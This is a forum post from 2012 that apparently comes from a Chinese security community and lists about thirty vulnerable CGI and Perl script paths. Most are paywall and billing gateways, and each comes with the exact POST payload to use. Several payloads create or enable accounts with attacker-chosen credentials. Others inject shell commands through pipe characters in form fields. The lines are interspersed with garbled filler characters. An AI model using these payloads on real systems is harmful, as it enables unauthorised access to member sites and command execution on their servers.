找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2712|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================- [  y. i+ ]1 h- p% z
/ o5 \1 Q  N+ V  e7 [/ l" n
/smspass.pl5 F7 k7 V4 H: v5 J: k
username=username&password=password/ ~4 _, v( ^# ^3 {8 p
; T" B+ t, |- k+ j) m
/index.cgi0 M9 \# _/ x* I1 G/ A0 @. {4 A
wei=ren&gen=command
! V# V. |: F$ `+ ]3 p9 K- L
$ ^+ B9 T8 d2 y/passmaster.cgi
, ?( t; p$ V9 n) w% u1 ~3 IAction=Add&Username=Username&Password=Password4 v& U$ V& w' p6 @  V5 u: Y1 A
; W9 a# |1 B. w- l4 P; X
/accountcreate.cgi
' ?% n% n. P1 {+ [username=username&password=password&ref1=|echo;ls|
3 f& C6 P, i7 k- X2 O8 y, D/ l. n$ \
% y$ g* l" W2 I* D/form.cgi
3 Q# H' q6 b+ r0 s) O, Yname=xxxx&email=email&subject=xxxx&response=|echo;ls|3 I" O) F/ ~! o9 b

' d+ U2 Y; e% e8 T* ~& a" X5 J8 ^/addusr.pl
0 \( s+ |/ l3 d8 r/cgi-bin/EuroDebit/addusr.pl) o- Y8 _% m% w0 [; Q- {* K4 L
user=username&pass=Password&confirm=Password! `# e7 P3 |  `, R: S
  x9 I2 @& F7 f( _: T+ F0 D* a% V9 m/ I
/ccbill-local.asp
2 O0 K6 V+ m% s! M2 n2 [5 bpost_values=username:password
5 c5 B/ m: }* |9 ~6 [& J0 k! v9 F1 o; {6 O- j: K9 z" c* g
/count.cgi* a2 h4 N4 B1 z6 X+ ^2 w# Y
pinfile=|echo;ls -la;exit|
- b9 D. ~/ d& V+ Y; r) Y) v. e. L( D# s/ C  S* u1 M
/recon.cgi' d$ p3 Q3 s; w: }
/recon.cgi?search; `- k5 w# {% n4 r% y- ~$ P
searchoption=1&searchfor=|echo;ls -al;exit|
9 P' W5 V2 @, `2 k, M2 x5 f) ~) ^: e
/verotelrum.pl
/ g* d/ z' ~2 B9 M8 bvercode=username:password:dseegsow:add:amount<&30>- T5 o2 b5 s7 P" S! b
: _/ s: D8 P0 Y& _' h  K
/af.cgi
$ q* z2 h* N1 M+ w( J* Q_browser_out=|echo;ls -la;exit;|
& L! J$ n7 X; S# E! b5 @+ ]1 S: q' f" [+ l4 t# W
/modify.cgi8 {; M; m4 a8 h- i
username=username&password=password&expire=30. v; ]# [: `: x5 _

2 t6 B. I* N2 I/openjournal.cgi/ f# {% v; x3 K3 l
edit=1&ct=2&go=|echo;ls -al;exit|  Y7 Q$ ^  g/ |- I2 r4 _% t0 b+ K2 L
, s5 `/ h3 D6 p0 u( X/ c% a6 _/ B
/gx9passwd.cgi5 Y4 P- d4 `3 _
cmd=ADD&user=username&pass=password3 s( a" v! b$ S

, b6 v1 r3 a2 h# b6 Q2 M% S/probecontrol.cgi
1 c# _2 o5 R" r0 rcommand=enable&username=username&password=password0 T' E& \  T  e- w: ?

2 a8 j! u) ?1 m7 S" @/recon.cgi6 I4 i. ]  P7 L, r# q  i; S
searchoption=3&searchfor=echo;ls -la;exit
! y$ _* p' C* p, d$ n+ @2 D+ }2 T7 p6 J6 n5 G
/htadd.pl: b) X& L; v' h" Z8 m
configfile=|echo; ls -alt; exit4 D7 R, q' C8 v6 F! x7 s; M
$ o& |1 J4 v0 n/ i( \$ p
/gx9passwd.cgi
% o! ?2 w4 l+ h6 ^1 P) kcmd=ADD&user=username&pass=password
/ Y0 Q& i3 l; ^+ s% s1 o1 K: i" G
/ibill*.pl
+ e8 n$ q2 [3 T# l0 a. breqtype=add&authpwd=authpwd&username=username&password=password, ^- ]+ a' U/ v3 i4 p) _

, t: q7 `0 o% p& O7 Q  {7 i/cpay.cgi
/ T* j- R& V" mcommand=add_member&username=username(EMAIL)&password=password(DES)$ ^) K. G6 r. E7 Q

5 S( L% V* @+ |0 ]. V- @- H/globill_ut.cgi
4 K% ]3 K1 Z7 o# o( Pdo=add&username=username&password=password&wpassword=password" y6 d* W2 \# B8 A% f) _
9 f- E) ~8 k' X  k5 Y
/usercontrol.cgi% I7 \6 ~1 M3 Y4 R
command=enable&username=USER&password=PASS3 W& D( x2 H# |$ ~. f
* H8 ^9 a, A. }1 J# ]
/globoSALErum.cgi
1 y# _& t9 i( S9 u/ ~) @1 W" j/ _7 jaction=ADD&seccode=seccode&login=username&password=password
* k. O+ H) @0 M5 u7 s1 d
( y. y6 ^. a& c* \7 U/addusr.pl
# ?: H* T( `' ], z% U; tuser=USER&pass=PASS&confirm=PASS
  }, M# \4 Y8 ]9 i0 v8 V! m  |4 ^5 s' {6 `3 _' o
/pincount.cgi
2 e7 _8 y& U- u/ d0 T% O/cgi-bin/mastergate/pincount.cgi4 B0 a3 q' v5 A+ g! G+ t0 q
pinfile=|echo;pwd;exit|- {# Y/ a0 R" W0 S* S. c
  U! T! O0 [4 e9 |
/accountcreate.cgi( Y, u2 G. k. G* ]- p
/cgi-bin/gateway/accountcreate.cgi
4 m6 @; A0 b" @4 }username=username&password=password&password2=password&ref1=|echo;ls -al;exit) o% N: v: s; Q

' R* ~# j3 E# s$ V$ m) \# v: z! P/af.cgi% I; Q4 F1 l8 D) A' U
/env.cgi
3 b/ ?4 E/ b" U0 ?, H- u, {; OADD+;echo;pwd;exit
1 M; i# v7 s0 D: T8 G6 N: x6 L% T! p: a1 z
/count.cgi2 x- t7 E  W9 M( F4 Q8 `7 c. V( A
pinfile=|echo;pwd;exit|  I. i1 Q& c* [$ U; G1 G
) S  Y+ b* I& \" ]+ b4 l
/recon.cgi: O& @( x9 T6 q- x( b# J
searchoption=1&searchfor=|echo;ls%20-al;exit|
4 Q; ?( y: b3 Y2 d4 y! E8 J. x+ O3 @; ~+ W3 O# r0 \3 \
/add.cgi
3 G) D/ J) s6 j& H8 s7 V! n: Pusername=username&password=password&expire=30$ o# s+ a: {. H% C

, k1 ]+ D5 Q" t) b3 l) {: w==============================
) d2 b' _4 v  C; q, T8 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表